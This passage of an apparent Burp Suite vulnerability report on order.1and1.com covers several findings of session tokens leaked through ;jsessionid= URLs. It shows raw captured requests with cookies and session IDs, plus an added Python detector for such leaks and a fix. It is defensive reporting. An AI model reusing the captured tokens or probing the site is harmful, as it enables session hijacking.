Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.93. http://order.1and1.com/xml/order/Service

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Service;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Service?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.94. http://order.1and1.com/xml/order/Sharepoint

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Sharepoint?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint
Content-Length: 0
Connection: close
Content-Type: text/plain


3.95. http://order.1and1.com/xml/order/TcSpecialOffers

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:35:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TcSpecialOffers?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.96. http://order.1and1.com/xml/order/TellAFriend

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The request URL carries the session token as a ;jsessionid= path parameter (servlet URL rewriting) ahead of the query string. A token in the URL is written to proxy and server logs and browser history, and is sent in the Referer header to any site linked from the page. As in 3.95, the 301 below drops the token from the Location header, but it was already transmitted in the request line:

Request

GET /xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TellAFriend?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tellafriend&linkType=txt
Content-Length: 0
Connection: close
Content-Type: text/plain


3.97. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The response contains the following links, each rewritten with the ;jsessionid= path parameter (the same value as in the request URL), so every navigation from this page carries the session token onward:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=VirtualServer&amp;linkOrigin=VirtualServer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=VirtualServer&amp;page=switch&amp;linkOrigin=VirtualServer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.tab.cds" rel="button-hd-tab-cds"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
</p><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
<div class="buttonForward"><a class="btn btn-blue-medium" href="/xml/order/VirtualServerXXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;ordernow=true"><span>
...[SNIP]...
</ul><a rel="height=480, width=665" class="btn btn-detail-lightblue window-open" href="/xml/order/popupServerOsVps;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=VirtualServer&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...
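Findings 3.95 to 3.97 are the same defect seen from two sides: the request URL carries a ;jsessionid= path parameter, and the served page rewrites every href with it. Burp flags this from the raw traffic; the Python check below does the same offline on a request line and a response body, so it can be run over a proxy export. It is an added example written for this page, not part of the XSS.CX report or of 1&1's code. The sample request line and the three-link HTML body are constructed from the traffic shown above (the /static/style.css link is invented as a negative case), the list of session parameter names is an assumption, and the split of the token into session id and ".TCpfix141a" suffix treats that suffix as a load-balancer route tag, which the report does not state.

```python
import re
from html import unescape
from urllib.parse import urlsplit, parse_qs

# Parameter names treated as session identifiers (assumption; extend as needed).
# jsessionid is the one the report shows; the rest are common equivalents.
SESSION_PARAM_NAMES = {"jsessionid", "phpsessid", "sessionid", "sid", "aspsessionid"}

# Servlet URL rewriting puts the token in a path parameter: "/page;jsessionid=ID.route?query"
PATH_PARAM_RE = re.compile(r";([A-Za-z0-9_]+)=([^;/?#]+)")
HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def session_tokens_in_url(url):
    """Return [(where, name, value)] for session tokens found in a URL.

    Covers both the ';name=value' path-parameter form (what this report shows)
    and ordinary query-string parameters. urlsplit() leaves path parameters
    inside .path, which is what we want here.
    """
    parts = urlsplit(url)
    found = []
    for name, value in PATH_PARAM_RE.findall(parts.path):
        if name.lower() in SESSION_PARAM_NAMES:
            found.append(("path", name, value))
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in SESSION_PARAM_NAMES:
            for value in values:
                found.append(("query", name, value))
    return found


def check_request_line(request_line):
    """Parse 'GET /target HTTP/1.1' and return the session tokens in its target."""
    _method, target, _version = request_line.split(" ", 2)
    return session_tokens_in_url(target)


def links_with_session_tokens(html_body):
    """Return [(href, tokens)] for every href in the body that carries a session token."""
    hits = []
    for raw_href in HREF_RE.findall(html_body):
        href = unescape(raw_href)  # &amp; -> & : the URL as the browser will request it
        tokens = session_tokens_in_url(href)
        if tokens:
            hits.append((href, tokens))
    return hits


def split_route(token):
    """Split 'SESSIONID.suffix' into (session id, suffix).

    The '.TCpfix141a' suffix in the report looks like a load-balancer route tag
    appended to the session id (assumption; the report does not say what it is).
    """
    sid, sep, route = token.partition(".")
    return (sid, route) if sep else (sid, "")


def summarize(request_line, html_body):
    """One record per exchange: tokens in the request URL, links that leak, distinct values."""
    hits = links_with_session_tokens(html_body)
    return {
        "request_tokens": check_request_line(request_line),
        "leaking_links": len(hits),
        "distinct_tokens": {value for _href, tokens in hits for _w, _n, value in tokens},
    }


# Constructed sample, modelled on finding 3.95 (request) and 3.97 (response body).
SAMPLE_REQUEST_LINE = (
    "GET /xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a"
    "?__frame=_top&__lf=Static HTTP/1.1"
)
SAMPLE_BODY = """
<a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Home</a>
<a href="/static/style.css">stylesheet (constructed negative case)</a>
<a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Domains</a>
"""

if __name__ == "__main__":
    report = summarize(SAMPLE_REQUEST_LINE, SAMPLE_BODY)
    for where, name, value in report["request_tokens"]:
        sid, route = split_route(value)
        print(f"request: {name} in {where}: id={sid} route={route}")
    print(f"{report['leaking_links']} links carry a session token; "
          f"distinct values: {sorted(report['distinct_tokens'])}")
```

The check parses the path parameter separately from the query string because a naive regex on the query alone misses exactly the ;jsessionid= form these findings show. On the application side the fix is to stop URL rewriting altogether: with Servlet 3.0 or later, set session-config tracking-mode to COOKIE in web.xml and drop any remaining calls to HttpServletResponse.encodeURL, so the cookie is the only carrier of the session id and rewritten links like those above disappear from the markup.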

3.98. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The request URL carries the session token as a ;jsessionid= path parameter (servlet URL rewriting) ahead of the query string. A token in the URL is written to proxy and server logs and browser history, and is sent in the Referer header to any site linked from the page; the Referer line of this very request already shows the token being passed along from the previous page:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
